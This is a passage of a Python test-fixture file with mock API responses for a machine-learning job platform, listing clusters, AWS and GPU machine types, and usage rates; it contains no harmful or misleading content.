"python script.py", "worker_container": "python", "worker_count": 2, "worker_machine_type": "c5.xlarge", "worker_use_dockerfile": False, "workspace_url": "s3://some_workspace.url" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "some_id" }, "totalItems": 40 } } } ], "meta": { "where": { "handle": "some_id" }, "totalItems": 1 }, "tagFilter": [] } EXAMPLE_CLUSTERS_LIST_RESPONSE = [ { "id": "cluster_id_1", "name": "cluster name 1", "type": "Job Cluster", "region": "Private", "cloud": "private", "teamId": "team_id", "isDefault": True, "dtCreated": "2019-07-05T23:28:17.416Z", "dtModified": "2019-07-05T23:28:17.416Z", "clusterId": 91, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_2", "name": "cluster name 2", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_3", "name": "cluster name 3", "type": "Job Cluster", "region": "Private", "cloud": "gcp", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-10-29T18:42:50.985Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 100, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] LIMITED_EXAMPLE_CLUSTERS_LIST_RESPONSE = [ { "id": "cluster_id_1", "name": "cluster name 1", "type": "Job Cluster", "region": "Private", "cloud": "private", "teamId": "team_id", "isDefault": True, "dtCreated": "2019-07-05T23:28:17.416Z", "dtModified": "2019-07-05T23:28:17.416Z", "clusterId": 91, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_2", "name": "cluster name 2", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] LIST_OF_VM_MACHINE_TYPES = { "92": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 21, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 22, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 38, "capacityId": 23, "vmType": { "label": "p2.xlarge", "kind": "aws-gpu", "cpus": 4, "ram": "65498251264", "gpuModelId": 11, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "small", "id": 38, "gpuModel": { "model": "passthrough", "label": "Tesla K80", "gpuGroupId": 8, "memInBytes": "12884901888", "memInMb": 12288, "memInGb": "12", "id": 11 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 38, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 134, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 24, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 25, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "102": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 65, "capacityId": 32, "vmType": { "label": "Wolfpass-CPU", "kind": "cpu", "cpus": 24, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-11T19:53:21.298Z", "dtModified": "2019-11-19T19:09:03.288Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 65, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 65, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-11T19:57:04.870Z", "isPreemptible": False, "id": 150, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clfe0kr2p", "name": "Intel Wolfpass KPS", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "intelwolfpass", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-11T16:34:29.495Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 102, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "103": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 33, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 34, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 37, "capacityId": 35, "vmType": { "label": "c5.24xlarge", "kind": "aws-cpu", "cpus": 94, "ram": "206158430208", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "large", "id": 37, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 37, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 133, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 36, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 37, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 38, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 39, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "175": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 134, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 135, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 38, "capacityId": 136, "vmType": { "label": "p2.xlarge", "kind": "aws-gpu", "cpus": 4, "ram": "65498251264", "gpuModelId": 11, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "small", "id": 38, "gpuModel": { "model": "passthrough", "label": "Tesla K80", "gpuGroupId": 8, "memInBytes": "12884901888", "memInMb": 12288, "memInGb": "12", "id": 11 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 38, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 134, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 137, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 138, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 139, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": 